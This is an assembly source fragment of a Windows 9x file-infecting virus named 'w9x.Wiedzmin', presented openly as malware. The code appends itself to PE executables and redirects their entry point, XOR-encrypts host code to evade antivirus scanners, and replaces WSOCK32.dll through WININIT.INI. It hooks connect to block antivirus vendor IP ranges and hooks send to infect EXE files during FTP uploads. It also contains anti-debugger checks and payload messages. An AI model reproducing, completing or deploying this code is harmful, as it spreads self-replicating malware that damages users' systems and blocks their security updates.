cmp dword ptr [esi],'xet.'
je _01
cmp dword ptr [esi],'EDOC'
je _01
mov dword ptr [ebp+help_virus],1



_01:
push eax
;STEP GET RAW ADDRESS

mov edx,ecx
sub edx,dword ptr [esi+0ch]          ;IMAGEBASE - VIRTUAL RVA=0
add edx,[esi+014h]                   ;ADD RAW OFFSET
mov dword ptr [ebp+e_where],edx

push edx
mov edx,[esi+010h]
mov dword ptr [ebp+e_bytes],edx
pop edx

add edx,dword ptr [ebp+fMapReal]     ;WHERE TO CRYPT!

mov ecx,[esi+10h]
mov dword ptr [ebp+e_god],0

mov dword ptr [ebp+firstk],1h

pushad

lea edi,[ebp+key_next]

call @GGEN_KEY
call @combine_key

mov eax,dword ptr [ebp+key_next]

popad
mov dword ptr [ebp+firstk],0

push esi
mov eax,dword ptr [ebp+key_next]
xor ebx,ebx


@loop_it:
;=> IF 5 BYTES ARE ZEROZ THEN THE DON't CRYPT BELOW
cmp byte ptr [edx],00h           
jne @go_
cmp byte ptr [edx+1],00h
jne @go_
cmp byte ptr [edx+2],00h
jne @go_
cmp byte ptr [edx+3],00h
jne @go_
cmp byte ptr [edx+4],00h
je @crypted


@go_:
xor byte ptr [edx],al

inc edx
loop @loop_it
jmp @e_out

@crypted:
pop esi
mov eax,dword ptr [ebp+e_bytes]
sub eax,ecx
mov dword ptr [ebp+e_bytes],eax

jmp @e_out


@e_error:


@e_out: 
pop eax
cmp dword ptr [ebp+help_virus],1
je @mute_other_virus
popad
ret

;ENTRY: EDI - BUFFER
@combine_key:
mov eax,dword ptr [ebp+key2]
stosd
add eax,dword ptr [ebp+key]
lea edi,[ebp+key_main]
stosd
ret

;**************************************************************************
;UNCRYPT                                                                *|*
;**************************************************************************
@uncrypt:

call delta_e
delta_e: pop ebp
         sub ebp,offset delta_e

pushad
mov edx,dword ptr [ebp+imagebase]
add edx,dword ptr [ebp+hosteip]

mov ecx,dword ptr [ebp+e_bytes]

xor ebx,ebx
mov eax,[ebp+key_next]

@lloop_it:
xor byte ptr [edx],al
inc edx
loop @lloop_it

f_e: 
cmp dword ptr [ebp+czy_je],0
jne @helper_endd
popad
ret

@helper_endd: 
popad

mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax


czy_je  dd 0
e_bytes dd 0
e_where dd 0
e_god   dd 0


hosteip   dd 0
imagebase dd 0
key_next  dd 0 


@helper_end: nop

;***********************************************************
@mute_other_virus:
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax                      ;ESI => PE HEADER               
mov edi,esi

xor eax,eax
mov ax,[esi + 06h]                  ;load number of sections
mov ecx,28h                         ;28 bytes for each section header
dec eax                             ;seeking for last,...
mul ecx                             ;and mul it
add esi,eax                         ; Normalize
add esi,78h                         ; Ptr to dir table
mov edx,[edi+74h]                   ; EDX = n§ of dir entries
shl edx,3                           ; EDX = EDX*8
add esi,edx                         ; ESI = Ptr to last section

mov edx,[esi+10h]                   ; EDX = SizeOfRawData
mov ebx,edx                         ; EBX = EDX
add edx,[esi+14h]                   ; EDX = EDX+PointerToRawData

push edx                             ; Preserve EDX

mov eax,ebx                         ; EAX = EBX
add eax,[esi+0Ch]                   ; EAX = EAX+VA Address
                                                ; EAX = New EIP
mov [edi+28h],eax                   ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax      ; Also store it


mov eax,dword ptr [ebp+fSize]
add eax,helper
mov ecx,[edi+3Ch]                   
call Align_                         

mov [esi+10h],eax                   
mov [esi+08h],eax                   

pop edx                             
                                    
mov eax,[esi+10h]                   
add eax,[esi+0Ch]                   
mov [edi+50h],eax                   

lea esi,[ebp+@uncrypt]                 ; ESI = Ptr to virus_start
xchg edi,edx                           ; EDI = Raw ptr after last
add edi,dword ptr [ebp+fMapReal]    ;EDI = Normalized ptr
mov ecx,helper 
mov dword ptr [ebp+czy_je],1
rep movsb

push dword ptr [ebp+offset fMapReal]
call dword ptr [ebp+_UnmapViewOfFile]

push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]

mov ecx,dword ptr [ebp+fSize]
add ecx,helper
call @zostaf


push dword ptr [ebp+fHnd]
call dword ptr [ebp+_CloseHandle]

popad
ret


;************************************************************************************************
;Wsock32 hooker!!!
;************************************************************************************************
@wsockz:
mov eax,dword ptr [ebp+_GetSystemDirectoryA]
mov ebx,dword ptr [ebp+_GPA]

push 260
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_GetSystemDirectoryA]

lea eax,[ebp+offset winDIRr]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]



lea edi,[ebp+sysDIR]
lea esi,[ebp+wsock]
call strcat

lea edi,[ebp+winDIRr]
lea esi,[ebp+nowe]
call strcat

push 1
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_CopyFileA]
cmp eax,0
je bye


lea edi,[ebp+finddata.cFileName]
lea esi,[ebp+winDIRr]
call strcat


mov dword ptr [ebp+go_wsock],1

push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase] 
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
cmp edx,-1
je bye

mov dword ptr [ebp+capis],0
mov eax,dword ptr [ebp+fMapReal]
mov dword ptr [ebp+wsock_h],eax

call @go_export

call _God


mov dword ptr [ebp+go_wsock],0

lea eax,[ebp+WININIT]
push eax
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
lea eax,[ebp+rename]
push eax
call dword ptr [ebp+_WritePrivateProfileStringA]




bye: ret


;************************************************************************************************
;STRCAT !!! Its smaller and faster (i think - but non optimized with repz)
;ENTRY:
;edi - base buffer
;esi - string to cut
;************************************************************************************************
strcat: 
push esi
mov esi,edi
sstrcat: lodsb
cmp al,0
jne sstrcat
dec esi
mov edi,esi
pop esi
cat_it: 
lodsb
cmp al,0
je le
stosb
jmp cat_it
le:ret


;************************************************************************************************
;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
;************************************************************************************************

@bad_name:
xor edi,edi
lea esi,[ebp+finddata.cFileName]
_letra:
lodsb 
cmp al,'a'
je error_a
cmp al,'A'
je error_a
cmp al,'E'
je error_a
cmp al,'e'
je error_a
cmp al,'v'
je error_a
cmp al,'V'
je error_a
ret

error_a: inc edi
         ret

;================================================================================================
;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ 
;================================================================================================

@GGEN_KEY:
cmp dword ptr [ebp+firstk],1
jne @go__
mov ebx,40h
mov dword ptr [ebp+key2],0h
jmp GEN_KEY

@go__:
mov dword ptr [ebp+offset key],0000000h   
mov ebx,55h
GEN_KEY: 
call dword ptr [ebp+_GetTickCount]
idiv ebx                             ;w EDX reszta ;) duzo prostszy algorymt zwracania losowych
cmp edx,ebx                           ;liczb niz ten T2000-Immortal Riota    
jae GEN_KEY      
inc edx                              ;MUSIMY COS SKODOWAC CHOCIAZ O +1  
cmp dword ptr [ebp+firstk],1
je @go___
mov dword ptr [ebp+offset key],edx  
@go___: mov dword ptr [ebp+offset key2],edx
ret



@CRYPT_BYTEZ:
mov ecx,edx

Try_crypt:       
lodsb                                ;czytamy bajta qrwa :P jest w AL
cmp al,0
je _zero
cmp al,07h
je _retprog

_next: add al,cl
       stosb
       jmp Try_crypt

_zero: inc edi
       jmp Try_crypt

_retprog: ret




@UN_CRYPT_BYTEZ:
mov ecx,dword ptr [ebp+offset key]
Try_uncrypt: 
lodsb
cmp al,0h
je _zero0
cmp al,07h
je ret0


_next0: sub al,cl
        stosb
        jmp Try_uncrypt

_zero0: inc edi
        jmp Try_uncrypt


ret0: ret



;================================================================================================
;HOOKER DATA
;================================================================================================
start_h:
hooked_connect:
call get_delta


pushad


mov edx,[esp+(10*4)]       ; EDX = sockaddr 
mov ecx,[edx+(2*2)]        ; ip
shl ecx,8                  ; last octet           

lea esi,[eax+DENIED]
mov edi,eax                ;save EAX in EDI

scan_denied:   lodsd
               dec esi
               shl eax,8
               jz TOC
               cmp ecx,eax
               jne scan_denied
               push WSAHOST_NOT_FOUND
               call dword ptr [edi+_WSASetLastError]
               popad                 
               push -1
               pop eax    
               jmp out_c               


TOC:                                   ;tHe oRgInal coNneCt ;]
popad
push    [esp+0Ch]                         ;int namelen
push    [esp+4+8]                         ;const struct sockaddr FAR*  name
push    [esp+8+4]                         ;SOCKET s
call    dword ptr [eax+a_connect]         ;call orginal connect!!!

out_c: retn 0Ch

;//////////////////////////////////////////////hooked send///////////////////////////////////////
hooked_send:
call get_delta
pushad
mov edi,eax
mov ebx,[esp+28h]                          ;20(PUSHAD)+8(FAR *buf)

mov eax,[ebx]

cmp eax,'ROTS'                             ;FTP: Storing a file ? ;)
je _ftp_store

TOS: 
popad                                     ;tHe oRgInaL sEnd
push    [esp+10h]                         ;int flags
push    [esp+4+0Ch]                       ;int len
push    [esp+8+8]                         ;const char FAR * buf
push    [esp+0Ch+4]                       ;SOCKET s
call    dword ptr [eax+a_send]            ;call orginal send!!!


out_s: retn 10h 

_ftp_store:                               ;yeah! infect on tha fly
mov edx,[esp+28h]                         ;point to name =] 
add edx,5                                 ;skip STOR and one space (5 bytes)

mov esi,[esp+28h]
@loop:
lodsb
cmp al,'.'                                  ;find first dod
jne @loop

dec esi
mov esi,[esi]                               ;a exe file!?
cmp esi,'EXE.'
je try_it
cmp esi,'exe.'
je try_it
jmp TOS


try_it: 
mov ecx,edi 
lea edi,[ecx+offset buff]
mov esi,edx
xor edx,edx
_l:
lodsb
cmp al,0dh
je _end
stosb 
inc edx
jmp _l

mov edi,edx

_end:
lea edx,[ecx+offset buff]
lea ebx,[ecx+offset inf_prog]

push ecx                              ;preserve ecx
push ebx
push 260
call dword ptr [ecx+gcd]              ;tricky ;] GetCurrentDirectory
                                      ;ftp clients use that to locate 
                                      ;file.
pop ecx                               ;load ecx

mov eax,edi
xor ebx,ebx
lea esi,[ecx+offset inf_prog]

_loop_1:
lodsb
inc ebx
cmp al,0
jne _loop_1

_do:
lea edi,[ecx+offset inf_prog]        ;add \ to patch ;]
add edi,ebx
dec edi
mov al,'\'
stosb
lea esi,[ecx+offset buff]

_l2:                                 ;well optimised strcat
lodsb
cmp al,0
je _skipp
stosb
jmp _l2

_skipp:
lea esi,[ecx+offset santa]
lea edi,[ecx+offset inf_prog2]
_cat:
lodsb
cmp al,0
je _catt
stosb
jmp _cat

_catt:
mov al,' '
stosb

lea esi,[ecx+offset inf_prog]
_make_real:
lodsb
cmp al,0
je done
stosb
jmp _make_real

done:
mov edi,ecx

push 1
lea eax,[edi+offset inf_prog2]
push eax
call dword ptr [edi+wex]

jmp TOS


reset_err:    push WSAECONNRESET
              call dword ptr [edi+_WSASetLastError]
              popad 
              push -1
              pop eax
              jmp out_s
;/*END-------------------------------------------------------------------------------------------
get_delta:
call @hookerdelta
@hookerdelta:
pop eax                             
sub eax,offset @hookerdelta         
ret


my_data: 
a_send dd 0
a_connect dd 0

msgg dd 0BFF44146h

DO_WPISU: _WSASetLastError dd 0
          wex              dd 0
          gcd              dd 0  


WSAHOST_NOT_FOUND       equ     11001
WSAECONNRESET           equ     10054 


buff        db 110 dup (0)
inf_prog2   db 260 dup (0)
inf_prog    db 260 dup (0)
santa      db 'C:\Program Files\deithwen.exe',0
;santa       db 'C:\WINDOWS\CALC.EXE',0

;***********DENIED LIST*************************************************************************
;thx goez to T-2000/Immortal Riot ;]

DENIED:         DB      161,069,003         ; nai.com
                DB      216,122,008         ; avp.com
                DB      195,170,248         ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
                DB      193,247,150         ; avp.ch, metro.ch
                DB      194,252,006         ; datafellows.com, f-secure.com
                DB      195,112,025         ; drsolomon.com
                DB      208,228,231         ; mcafee.com
                DB      194,203,134         ; sophos.com
                DB      146,145,148         ; norman.com
                DB      206,204,003         ; pandasoftware.com
                DB      193,004,210         ; complex.is
                DB      203,037,250         ; leprechaun.com.au
                DB      141,202,248         ; cai.com
                DB      216,033,022         ; antivirus.com, trendmicro.com
                DB      216,035,137         ; sarc.com
                DB      216,086,104         ; virus.com
                DB      212,029,228         ; invircible.com
                DB      208,226,167         ; symantec.com
                DB      207,227,040         ; grisoft.com
                DB      194,105,193         ; drweb.ru
                DB      000,000,000         ; end of table.

hook_end label byte
;________________________________________________________________________________________________
;============================================================================================DATA
;________________________________________________________________________________________________

;**APIZ TO HOOK**
A1 db 'send',0
A1s equ $-A1
A2 db 'connect',0
A2s equ $-A2




e_esi   dd 0

APIS db 'GetProcAddress',0
APIS_SIZE = $ - APIS


APIList:     db "FindFirstFileA",0
             db "FindNextFileA",0
             db "FindClose",0
             db "SetFileAttributesA",0
             db "SetFileTime",0
             db "CreateFileA",0
             db "CreateFileMappingA",0
             db "MapViewOfFile",0
             db "UnmapViewOfFile",0
             db "GetFileTime",0
             db "GetFileSize",0
             db "GetFileAttributesA",0
             db "SetFileAttributesA",0
             db "ReadFile",0
             db "WriteFile",0
             db "SetFilePointer",0
             db "SetEndOfFile",0
             db "CloseHandle",0        
             db "SetCurrentDirectoryA",0 
             db "GetWindowsDirectoryA",0
             db "GetSystemDirectoryA",0
             db "CopyFileA",0
             db "ExitProcess",0
             db "GetTickCount",0
             db "GetCommandLineA",0
             db "IsDebuggerPresent",0
             db "OutputDebugStringA",0
             db "WinExec",0
             db "LoadLibraryA",0
             db "GetModuleHandleA",0
             db "Sleep",0
             db "GetSystemTime",0
             db "WritePrivateProfileStringA",0
             db "VirtualAlloc",0
             db "VirtualFree",0
             db "GetCurrentDirectoryA",0,07h  ;07h stops the looking up
             
msg dd 0BFF44146h

key        dd 0

;shit7 db "w.dll",0

marker db 'sru.exe',0
;marker db '*.exe',0



TO_CRYPT_DATA:  to_ja:      db 0ah,0dh
                            db "",0ah,0dh
                            db "<w9x.Wiedzmin (c) -  YuP  - Welcome to new school>",0ah,0dh
                            db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh
                            db "Ć Deithwen Addan Flared Again",0ah,0dh
                            db "Ć You have eyez, but u can't see",0ah,0dh
                            db "Ć You have earz, but u can't hear",0ah,0dh
                            db "Ć Wake up from unreal world before",0ah,0dh
                            db "Ć you drown in the Sea of Chaos.",0ah,0dh
                            db "",0ah,0dh
                            db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh
                            db 0ah,0dh,0
                 wsock      db "\WSOCK32.dll",0
                 nowe       db "\WZZOCK32.dll",0
                 sice9x     db "\\.\SICE",0
                 sle        db "WSASetLastError",0
                 user32     db "USER32.DLL",0
                  gdi32     db "GDI32.DLL",0
                 WININIT    db "WININIT.INI",0
                   rename   db "rename",0
                      jed   db "X",0
                      famil db "Verdana",0
                       logo db ": w9x.WiEDZMiN has you :",0
                deshit      db "kfe",0,07h  





@crypt_my_body:
push ecx
call dword ptr [ebp+_GetTickCount]
mov ebx,255
idiv ebx
mov ecx,edx

@mutualisk:
mov byte ptr [edi],90h
inc edi
loop @mutualisk
pop ecx

pushad
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE

@loop_decryptt:
xor byte ptr [edx],al
inc edx
loop @loop_decryptt
@end_de: 
popad
rep movsb
mov edi,'!PUY'
call @main_decryptor
ret



key_main dd 0

;db 5 dup (90h)


      ; align   dword
VirusEnd label byte

;==================================================FIND=========================================
;=============================================VirtualData nie idzie do wira=====================

HeapStart label byte 
finddata WIN32_FIND_DATA <>   ;wskaznik do struktury
fileHandle dd 0
fileAtrib               dd 0


licznik_b dd 0


APIListA:   _FindFirstFileA        dd 0
            _FindNextFileA         dd 0
            _FindClose             dd 0
            _SetAttributesA        dd 0
            _SetFileTime           dd 0
            _CreateFileA           dd 0
            _CreateFileMappingA    dd 0
            _MapViewOfFile         dd 0
            _UnmapViewOfFile       dd 0
            _GetFileTime           dd 0
            _GetFileSize           dd 0
            _GetFileAttributesA    dd 0
            _SetFileAttributesA    dd 0
            _ReadFile              dd 0
            _WriteFile             dd 0
            _SetFilePointer        dd 0
            _SetEndOfFile          dd 0 
            _CloseHandle           dd 0
            _SetCurrentDirectoryA  dd 0 
            _GetWindowsDirectoryA  dd 0
            _GetSystemDirectoryA   dd 0
            _CopyFileA             dd 0
            _ExitProcess           dd 0 
            _GetTickCount          dd 0
            _GetCommandLineA       dd 0
            _IsDebuggerPresent     dd 0
            _OutputDebugStringA    dd 0
            _WinExec               dd 0
            _LoadLibraryA          dd 0
            _GetModuleHandleA      dd 0
            _Sleep                 dd 0
            _GetSystemTime         dd 0
            _WritePrivateProfileStringA dd 0
            _VirtualAlloc          dd 0
            _VirtualFree           dd 0
            _GetCurrentDirectoryA  dd 0


@GDI_APIZA: _CreateFontA      dd 0
            _TextOutA         dd 0
            _SetBkMode        dd 0
            _SetTextColor     dd 0
            _SelectObject     dd 0
            _GetSystemMetrics dd 0
            _GetDesktopWindow dd 0
            _GetWindowDC      dd 0
            _ReleaseDC        dd 0


SYSTEM_TIME:  wYear         dw 0 
              wMonth        dw 0  
              wDayOfWeek    dw 0   
              wDay          dw 0 
              wHour         dw 0 
              wMinute       dw 0 
              wSecond       dw 0 
              wMilliseconds dw 0 



F1: dd 2 dup (?) 
F2: dd 2 dup (?)
F3: dd 2 dup (?)

vbuf       dd 0
help_virus dd 0
memory     dd 0
header     dd 0
align      dd 0
_hostIP    dd 0
_secAlign  dd 0
newEIP dd 0
NewEIP dd 0
firstk dd 0
key2   dd 0

go_wsock  dd 0
wsock_h   dd 0
moj_address dd 0
capis       dd 0
wsock_hh    dd 0

NON dd 0                                              ;numbers of names
AOF dd 0                                              ;addr of Functions
AON dd 0                                              ;addr of Names
AOO dd 0                                              ;addr of Ordinals

IndexA dd 0
_GPA   dd 0

fHnd                    dd  0
fHndMap                 dd  0
fMapReal                dd  0
fSize                   dd  0

my_seh dd 0

was_win dd 0
ic dd 0
sHnd dd 0
shitsize dd 0


oldDIR                  db  512 dup (?)
winDIR                  db  260 dup (?)
sysDIR                  db  260 dup (?)
winDIRr                 db  260 dup (?) 
db 5 dup (?)




toHOST dd 0


      ; align dword 
HeapEnd label byte



titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
bodyy  db "Elaine blath, Feainnewedd",0ah,0dh
       db "Dearme aen a'caelme tedd",0ah,0dh
       db "Eigean evelienn deireadh",0ah,0dh
       db "Que'n esse, va en esseath",0ah,0dh
       db "Feainnewedd, elaine blath!"
       db 0ah,0dh
       virussizee
       db      " bytes",0

fakehost:
push 0h
push offset titlee
push offset bodyy
push 0h
call MessageBoxA


push 0h
call ExitProcess


endshit: ends


End  v_start